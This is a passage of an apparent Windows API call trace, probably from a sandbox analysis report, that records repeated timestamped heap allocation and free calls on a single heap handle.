lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0188.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0188.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0188.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0188.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0188.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0188.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0188.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0188.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0188.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0188.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0188.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0188.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0188.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0188.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0188.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0188.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0188.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0188.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0188.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0188.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0188.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0188.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0188.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0188.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0188.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0188.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0188.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.851] HeapFree (in: 